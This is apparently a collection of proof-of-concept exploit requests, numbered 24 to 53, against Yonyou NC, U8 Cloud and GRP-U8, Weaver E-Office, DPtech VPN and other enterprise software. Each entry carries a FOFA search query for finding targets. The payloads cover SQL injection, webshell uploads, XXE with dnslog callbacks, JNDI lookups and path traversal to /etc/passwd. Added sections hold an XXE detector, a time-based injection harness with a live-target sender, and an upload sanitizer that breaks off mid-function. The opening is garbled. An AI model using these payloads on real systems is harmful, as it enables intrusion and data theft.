3 `# r% u% T3 {6 h* ?* y f1 Z. s- Y1 ^! M: I
{2 W, |% f3 L8 C& i! S
"a":{
x* }6 _6 d, l9 k1 l% H1 N! r "@type":"com.alibaba.fastjson.JSONObject",
5 q ~7 x9 s9 i: X6 z {"@type":"java.net.URL","val":"http://DNSLOG"}- I" @- P" Y) `6 J! z0 F
}""! t4 B# r' u+ ^' d: A
}3 z. H2 G/ G4 a; _; F
! c+ u! X% u3 R7 X7 q' T3 r) A5 }# q' ~6 M {9 S% x* W
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
The fname field sets the server-side destination, so a part uploaded as .txt is written as a .jsp under the web root.
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The groupid and fileType parameters decide the stored directory and extension; the uploaded file is then reachable at:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Version: <=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
The filename carries a relative path into the web root, and the accessToken header is an HS512 JWT whose payload claims userid 1 / userCode admin.
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
  <soapenv:Header/>
  <soapenv:Body>
    <iup:getResult>
      <!--type: string-->
      <iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
    </iup:getResult>
  </soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Follow-up request:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

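The five XXE entries above (36, 37, 38, 40 and 45) deliver the DOCTYPE in three different shapes: as a raw text/xml body (37, 40), as a form field that holds XML (msg in 36, __xml in 38, reqData in 45), and, in 38, with the entity reference itself percent-encoded (%26Password;). A detection rule that only greps the raw body for &name; misses that last form. The checker below is an added example written for this page, not code from Yonyou or any product: it decodes form fields first, classifies what it finds, and shows the parser-side counterpart that refuses any DTD. The sample bodies are constructed after the POCs with the callback host replaced by attacker.example.

```python
"""Find DTD and entity declarations in inbound request bodies (added example)."""
import re
import urllib.parse
import xml.parsers.expat
from typing import Iterator, List, Tuple

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
EXTERNAL_DTD_RE = re.compile(r"<!DOCTYPE\s+\S+\s+(?:SYSTEM|PUBLIC)\b", re.I)
ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.I)


def xml_candidates(content_type: str, body: str) -> Iterator[Tuple[str, str]]:
    """Yield (location, text) for every place XML may sit in this request."""
    if content_type.split(";")[0].strip() == "application/x-www-form-urlencoded":
        # Split on '&' only, then percent-decode each value once:
        # %26Password%3b in the wire body becomes &Password; here.
        for field in body.split("&"):
            key, _, value = field.partition("=")
            yield urllib.parse.unquote_plus(key), urllib.parse.unquote_plus(value)
    else:
        yield "body", body


def xxe_findings(content_type: str, body: str) -> List[Tuple[str, List[str]]]:
    """Return [(location, [kinds])] for each candidate that declares a DTD.
    kinds: external-dtd (DOCTYPE ... SYSTEM/PUBLIC), external-entity,
    parameter-entity, or plain doctype when no external reference is present."""
    findings = []
    for where, text in xml_candidates(content_type, body):
        if not DOCTYPE_RE.search(text):
            continue
        kinds = set()
        if EXTERNAL_DTD_RE.search(text):
            kinds.add("external-dtd")
        for m in ENTITY_RE.finditer(text):
            kinds.add("parameter-entity" if m.group(1) else "external-entity")
        findings.append((where, sorted(kinds) or ["doctype"]))
    return findings


def parse_rejecting_dtd(text: str) -> bool:
    """Server-side counterpart: parse with expat but abort on any DOCTYPE; an
    undefined entity reference is also an error. True means well-formed and DTD-free.
    Limit: XML wrapped in CDATA (entry 37) is plain text to this parser, so
    whatever unwraps and re-parses that string needs the same guard."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError("DTD not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(text, True)
    except (ValueError, xml.parsers.expat.ExpatError):
        return False
    return True


# Constructed samples modelled on entries 37, 38, 45 and 40 (not captured traffic).
RAW_37 = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
          '<soapenv:Body><iup:getResult xmlns:iup="http://update.oba.uap.nc/IUpdateService">'
          '<iup:string><![CDATA[<!DOCTYPE x [<!ENTITY % aaa SYSTEM "http://attacker.example/e.dtd">%aaa;]>'
          '<xxx/>]]></iup:string></iup:getResult></soapenv:Body></soapenv:Envelope>')
FORM_38 = ('__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel'
           '&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]>'
           '<rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>')
FORM_45 = 'reqData=<?xml version="1.0"?>\n<!DOCTYPE foo SYSTEM "http://attacker.example/x.dtd">&signData=1&userIP=1'
RAW_40 = '<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://attacker.example/">]><r><a>&xxe;</a></r>'

if __name__ == "__main__":
    for ct, body in (("text/xml;charset=UTF-8", RAW_37), ("application/x-www-form-urlencoded", FORM_38),
                     ("application/x-www-form-urlencoded", FORM_45), ("text/xml", RAW_40)):
        print(xxe_findings(ct, body), parse_rejecting_dtd(body) if ct.startswith("text/xml") else "-")
```

The CDATA case is the one to remember: for entry 37 the string-level scan reports a parameter entity while the outer parse succeeds, because the DTD only exists once the service pulls the string out of the CDATA section and parses it again.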
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud (government finance cloud) arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
The trailing space after .php in the filename is part of the payload.
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file path:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

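Entries 26, 29 to 34, 41, 43, 44, 46 and 51 all use the same oracle: an injected delay, waitfor delay '0:0:5' on MSSQL and DBMS_PIPE.RECEIVE_MESSAGE(...,5) on Oracle. A single slow response proves nothing on a loaded server, so the harness below, an added example for this page rather than the article's own tooling, measures a baseline first and then requires every delayed probe to exceed it by roughly the requested number of seconds. The urllib sender, the target host and the simulated endpoint are assumptions; the simulated endpoint exists only so the harness can be run offline.

```python
"""Time-based blind SQL injection verification with jitter handling (added example)."""
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict

# Delay fragments as they appear in the requests above, parameterised on seconds.
DELAY_PROBES = {
    "mssql": "1'waitfor delay '0:0:{secs}'--",
    "oracle": "1' AND 4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),{secs})--",
}


def build_probe(dialect: str, secs) -> str:
    return DELAY_PROBES[dialect].format(secs=secs)


def elapsed(send: Callable[[str], None], value: str) -> float:
    """Wall-clock seconds for one request carrying `value` in the injected parameter."""
    t0 = time.perf_counter()
    send(value)
    return time.perf_counter() - t0


def is_time_based_injectable(send, dialect="mssql", secs=5, rounds=3, slack=0.5) -> bool:
    """True only if every delayed round is at least (secs - slack) slower than the
    fastest baseline round. Several baseline rounds absorb normal jitter, and one
    fast delayed round is enough to reject, so a busy server cannot fake a hit."""
    baseline = min(elapsed(send, "1") for _ in range(rounds))
    probe = build_probe(dialect, secs)
    return all(elapsed(send, probe) - baseline >= secs - slack for _ in range(rounds))


def urllib_sender(base_url: str, param: str, fixed: Dict[str, str]) -> Callable[[str], None]:
    """Build send() for a GET endpoint, e.g. base_url='http://target/portal/pt/yercommon/linkVoucher',
    fixed={'pageId': 'login'}, param='pkBill' (endpoint from entry 26; the host is assumed).
    Only timing matters here, so HTTP error statuses are swallowed."""
    def send(value: str) -> None:
        qs = urllib.parse.urlencode({**fixed, param: value})
        try:
            urllib.request.urlopen(f"{base_url}?{qs}", timeout=60).read()
        except urllib.error.HTTPError:
            pass
    return send


def simulated_target(vulnerable: bool, secs: float) -> Callable[[str], None]:
    """Constructed stand-in for a real endpoint so the harness runs offline:
    a vulnerable target 'executes' the delay, a patched one ignores it."""
    def send(value: str) -> None:
        v = value.lower()
        if vulnerable and ("waitfor" in v or "dbms_pipe" in v):
            time.sleep(secs)
    return send


if __name__ == "__main__":
    for name, target in (("vulnerable", simulated_target(True, 0.3)),
                         ("patched", simulated_target(False, 0.3))):
        print(name, is_time_based_injectable(target, "mssql", secs=0.3, rounds=2, slack=0.1))
```

Against a real host keep secs at the 5 seconds the POCs use and rounds at 3; the short values in the demo only keep the offline run fast.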
52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech (迪普) VPN Service arbitrary file read (path traversal)
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

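Two recurring defects above are that the client chooses where an upload lands or what extension it gets (fname=\webapps\nc_web\...jsp in 24, groupid and fileType in 28, filename="./webapps/nc_web/1.jsp" in 35, filename="s.php" in 48 and the trailing-space filename="%s.php " in 49), and that a download name walks out of the base directory (fileName=../../../etc/passwd in 47, the percent-encoded ..%2F chain in 53). The two functions below are an added example written for this page, not vendor code; the extension allowlist and the /srv/app/files base directory are assumptions.

```python
"""Server-side handling of client-supplied file names (added example)."""
import re
import secrets
import urllib.parse
from pathlib import Path
from typing import Optional

ALLOWED_EXT = {"pdf", "png", "jpg", "jpeg", "xlsx", "docx", "txt"}  # assumed policy
STEM_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def safe_upload_name(client_filename: str) -> Optional[str]:
    """Return a server-chosen stored name, or None to refuse the upload.

    The client name contributes only its extension. Any path separator is refused
    outright (a browser sends a bare name), trailing spaces and dots are stripped
    before checking (Windows drops them on create, which is what "%s.php " relies
    on), exactly one extension is allowed and it must be on the allowlist, and the
    stored name is random so the client can neither choose nor predict it.
    """
    if "/" in client_filename or "\\" in client_filename or "\x00" in client_filename:
        return None
    name = client_filename.rstrip(" .")
    stem, dot, ext = name.rpartition(".")
    if not dot or not STEM_RE.fullmatch(stem) or ext.lower() not in ALLOWED_EXT:
        return None
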